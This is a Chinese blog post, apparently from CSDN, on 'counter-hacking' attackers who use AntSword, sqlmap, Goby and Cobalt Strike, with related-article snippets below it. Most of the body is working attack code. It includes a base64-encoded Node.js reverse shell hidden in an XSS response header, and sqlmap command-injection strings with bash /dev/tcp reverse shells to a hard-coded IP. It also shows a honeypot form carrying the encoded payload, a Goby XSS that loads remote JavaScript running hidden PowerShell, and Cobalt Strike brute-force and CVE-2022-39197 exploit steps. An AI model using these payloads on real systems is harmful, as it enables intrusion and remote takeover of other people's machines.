朔源反制-170-对抗上线CS,Goby,蚁剑,Sqlmap等安全工具

最新推荐文章于 2024-05-14 20:45:12 发布
最新推荐文章于 2024-05-14 20:45:12 发布
阅读量431 收藏 3
点赞数
文章标签: 网络安全 Powered by 金山文档
.
本文链接:https://blog.csdn.net/wuqingsix/article/details/129091238
版权

cs反制

红队在进行连接后门时候:

代码为一句话后门:<?php @eval($_POST[x];?>

修改为

<?php

header('HTTP/1.1 500 <img src=# οnerrοr=alert(1)>');

该字段意思为:当img src指向的图片不存在时会弹窗1

依据此 可进行蚁剑上线代码:

var net = require("net"), sh = require("child_process").exec("cmd.exe");

var client = new net.Socket();

client.connect(xx, "xx.xx.xx.xx", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

xx为监听的端口号 xx.xx.xx.xx为监听主机

两者组合编码后:

header("HTTP/1.1 500 Not <img src=# οnerrοr='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMDA4NiwgIjQ3Ljk0LjIzNi4xMTciLCBmdW5jdGlvbigpe2NsaWVudC5waXBlKHNoLnN0ZGluKTtzaC5zdGRvdXQucGlwZShjbGllbnQpO3NoLnN0ZGVyci5waXBlKGNsaWVudCk7fSk7`,`base64`).toString())'>");

最终 蓝队通过修改后门的代码实现获得蚁剑使用者的权限(主机权限)

sqlmap反制

构造一个页面 在含有注入点的时候,其中数据包含有反制的数据包:步骤为

命令管道符:ping "`dir`"

构造注入点页面固定注入参数值,等待攻击者进行注入

sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`dir`"

将dir的参数换为 反弹shell的命令

sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`exec /bin/sh 0</dev/tcp/47.94.236.117/2333 1>&0 2>&0`"

1、测试反弹编码:

bash -i >& /dev/tcp/47.94.236.117/2333 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ==

echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i

2、蓝队构造页面test.php注入页面固定参数值:

<html>

<head>

<meta charset="utf-8">

<title> A sqlmap honeypot demo</title>

</head>

<body>

<input>search the user</input> <!--创建一个空白表单-->

<form action="username.html" method="post" enctype="text/plain">

<!--创建一个隐藏的表单-->

<input type='hidden' name='name' value="xiaodi&id=45273434&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"/>

<!--创建一个按钮,提交表单内容-->

<input type="submit" value='提交'>

</form>

</body>

</html>

3、红队攻击者进行注入测试:

sqlmap -u "http://xx.xx.xx.xx/test.php" --data "name=xiaodi&id=45273434&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"

即可中招

goby反制

构造页面中含有反制代码的js文件,

index页面

index.php

<?php

header("X-Powered-By: PHP/<img src=1 οnerrοr=import(unescape('http%3A//47.94.236.117/1.js'))>");

?>

<head>

<title>TEST</title>

</head>

<body>

testtest

</body>

</html>

js文件:此处换为Cs的powershell,红队在进行资产信息查看时,会触发反弹shell

(function(){

require('child_process').exec('powershell -nop -w hidden -encodedcommand JABXXXXXXXX......');

})();

cs反制

反制Server,爆破密码(通用)

针对没有采用隐匿C2地址的技术导致的反制(后门样本被溯源到C2地址)

项目地址https://github.com/ryanohoro/csbruter

python csbruter.py 47.94.236.117 pass.txt

利用漏洞(CVE-2022-39197)Cobalt Strike <=4.7 XSS

项目地址https://github.com/its-arun/CVE-2022-39197

条件:有木马样本

取得红队木马样本开始操作如下:

1、蓝队修改EXP里面的执行命令后编译,红队客户端所触发的东西在这里修改:如上线cs

步骤为:修改:EvilJar/src/main/java/Exploit.java

2、蓝队修改svg加载地址并架设Web服务(红队的CS服务器能访问的Web服务)

修改:evil.svg 指向url地址

python -m http.server 8888

3、蓝队执行EXP调用后门上线,攻击者进程查看时触发

python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.svg

My Year 2019
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
溯源(八)之利用goby RCE 进行反制黑客
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-03 763
当然在这里我们要点击这个之后代码才会被触发,实际过程中我们需要诱导攻击者去点击这些可以交互的地方,我这里可以给大家提供一个思路,我们可以在环境中部署一个蜜罐,那蜜罐是不是会模拟很多可以攻击的服务诱导攻击者攻击,在goby扫描过程中,攻击者看到那么多的服务会不会去疯狂点击和查看扫到了些什么?当goby再扫描网站时,会去扫描网站下的目录,再根据网站目录下的文件去得到一些网站的信息,我们扫到的php服务就是根据被扫的文件得到的。所展示给我们的网站扫出来的信息都是程序写死的,这样我们很难去利用xss漏洞去反制
Goby反制复现
qq_50854662的博客
11-03 525
Goby反制复现
探索CSBruter:网络认证破解工具的技术深度与应用(1)
最新发布
2401_84968582的博客
05-14 841
CSBruter是一个开源的网络认证系统破解工具,由Ryan O’Horo开发并维护。它主要针对HTTP的基本认证和NTLM认证进行暴力破解,帮助安全研究人员测试网站的安全性。该项目利用Python语言编写,结合了异步I/O模型,使其在性能上有了显著提升。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
【应急响应】战中溯源反制&对抗上线CS&Goby&&Sqlmap安全工具
今天是几号的博客
04-20 1630
CS反制 Goby反制 Antsword反制 AWVS反制 BURP反制 SQLMAP反制 XSS钓鱼 蜜罐反制。前面准备工作都是一气呵成,这里有个一很坑的地方就是使用pip安装Frida module时,一开始安装总是报错(tiemout以及各种问题),然后我不停的换Pytthon版本emmm,最后解决是使用超级管理员权限运行cmd就好了(心中无数个?) ```bash python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.sv
溯源反制-SQLMAP反制
m0_62172162的博客
04-25 684
溯源反制-SQLMAP反制
应急响应—溯源反制
剁椒鱼头没剁椒的博客
11-07 1306
可能整体来说很简单,目前根据IP地址能够进行溯源的也就这些了,基本上都是看裤子来解决,不靠裤子,除非去加上微信去忽悠,否则获取手机号确实没那么容易。当然如果你条件允许,你直接通过获取到的IP直接攻击他,直接拿下他服务器那什么获取不到…
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
根据提供的文件名`sqlmapproject-sqlmap-99f07b6`,这可能是一个包含源代码或特定构建的版本。 2. 目标检测:使用`sqlmap -u URL`命令检测目标URL是否存在SQL注入漏洞。 3. 漏洞确认:通过`sqlmap --dbs`列出所有可...
Python-Atlas一个开源工具可以建议SQLMap篡改绕WAFIDSIPS
08-10
Atlas - 一个开源工具,可以建议SQLMap篡改绕WAF/IDS/IPS,该工具基于返回的状态代码。
sqlmap中文手册-sql注入自动化测试工具
07-19
SQLMap是一款强大的自动化工具,专门用于检测和利用SQL注入漏洞。它可以帮助安全测试人员和渗透测试专家快速识别和利用Web应用程序中的SQL注入弱点,从而获取数据库中的敏感信息,甚至控制底层文件系统和操作系统。...
sqlmap-1.4.5.zip
05-22
sqlmap-1.4.5,亲爱的朋友,SQLMAP是自动化的SQL注入和数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的...
HW溯源反制
xmj818719的博客
08-25 834
HW溯源反制-好文转载
记一次sql注入艰难上传马过程
weixin_46079186的博客
01-26 4884
先说一下我的思路,得到一个sql注入点,sqlmap 进行os-shell ,然后想上传webshell,首先进行cs 上线,发现无法上线cs,原因是目标系统windwos 2003 没有powershell,换一个思路,先找到web路径,然后上传webshell。找到web路径之后,发现路径带中文,os-shell写入webshell 的时候就会提示没有这个路径,然后进行一个手注发现上传成功 发现注入点,使用sqlmap进行os-shell 尝试上线cs,为了更好的后续操作(失败) 执行powersh
7、应急响应-战中溯源反制&对抗上线&&CS&Goby&Sqlmap安全工具
m0_65842464的博客
01-29 2687
黑客一般会用到工具Sqlmap,Goby等对目标网站的现有资产做批量扫描和测试,同时也会利用Web应用漏洞上传后门来上线肉机,用到工具例如:CS等,那么作为蓝队应急人员,就可以针对这些行为采取反制手段。命令管道符:ping "`dir`" , linux系统执行该命令时,管道符中的字符串被当作命令执行。原理:蓝队在红队攻击目标上写一个特殊文件,红队用goby扫描分析时会触发反制被蓝队拿到机器权限。同样以上命令在红队攻击机执行时,参数b管道符中的字符串会被当做命令执行。
溯源反制-工具反制-反制
m0_62172162的博客
04-25 241
溯源反制-工具反制-反制
溯源反制-漏洞扫描工具-Goby&Awvs
m0_62172162的博客
04-25 366
溯源反制-漏洞扫描工具-Goby&Awvs
记一次曲折的获取权限
m0_60571990的博客
12-10 881
记一次曲折的获取权限
溯源反制-远程控制工具-CobaltStrike
m0_62172162的博客
04-25 610
溯源反制-远程控制工具-CobaltStrike
反制Goby扫描之XSS点击上线
痴人说梦梦中人
08-15 2934
反制Goby之XSS点击上线1.测试环境2.XSS测试2.1 修改http服务器的`X-Powered-By`3.CS上线 最近看到有大佬利用goby漏洞反制攻击者,特意复现下,原理就是通过XSS进行交互,调用Node.js函数exec执行命令,最新版本已经进行了修复,如果还在使用低版本还是尽快升级吧。 1.测试环境 goby-win-x64-1.8.255 phpstudy2016 CS4.3 2.XSS测试 2.1 修改http服务器的X-Powered-By 注意此处<img src=1 o
如何使用Nmap、Sqlmap、Burpsuite等工具进行安全测试;
05-25
Nmap、Sqlmap、Burpsuite是非常流行的安全测试工具,可以帮助安全测试人员检测网络和应用程序中的漏洞和安全问题。以下是这些工具的简要说明和使用方法: 1. Nmap:Nmap是一款网络探测和安全测试工具,可以用于扫描网络上的主机和端口,识别主机操作系统和服务,检测漏洞等。常用命令包括: - 扫描目标主机:nmap [target IP] - 扫描指定端口:nmap -p [port number] [target IP] - 扫描指定端口范围:nmap -p [start port]-[end port] [target IP] - 探测主机操作系统:nmap -O [target IP] - 探测服务版本:nmap -sV [target IP] 2. SqlmapSqlmap是一款自动化SQL注入工具,可以用于检测Web应用程序中的SQL注入漏洞。常用命令包括: - 检测SQL注入漏洞:sqlmap -u [target URL] - 指定数据库类型:sqlmap -u [target URL] --dbms=[database type] - 指定注入点参数:sqlmap -u [target URL] -p [parameter name] - 获取数据库信息:sqlmap -u [target URL] -D [database name] --tables - 获取表信息:sqlmap -u [target URL] -D [database name] -T [table name] --columns 3. Burpsuite:Burpsuite是一款用于拦截、修改和重发HTTP请求的代理工具,可以用于Web应用程序的安全测试。常用功能包括: - 拦截HTTP请求和响应:在Proxy -> Intercept页面启用拦截功能,可以手动拦截HTTP请求和响应,并对其进行修改和重发。 - 扫描Web应用程序:在Scanner -> Active Scan页面,可以对Web应用程序进行漏洞扫描,包括SQL注入、XSS等。 - 模拟攻击:在Intruder页面,可以模拟各种攻击,如密码猜测、文件包含、命令执行等。 - 破解会话:在Session Handling -> Session Management页面,可以对Web应用程序的会话进行管理和破解。 以上是这些工具的简要说明和使用方法,使用这些工具进行安全测试需要具备一定的技术水平和安全意识,建议在合法授权和合规的情况下进行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值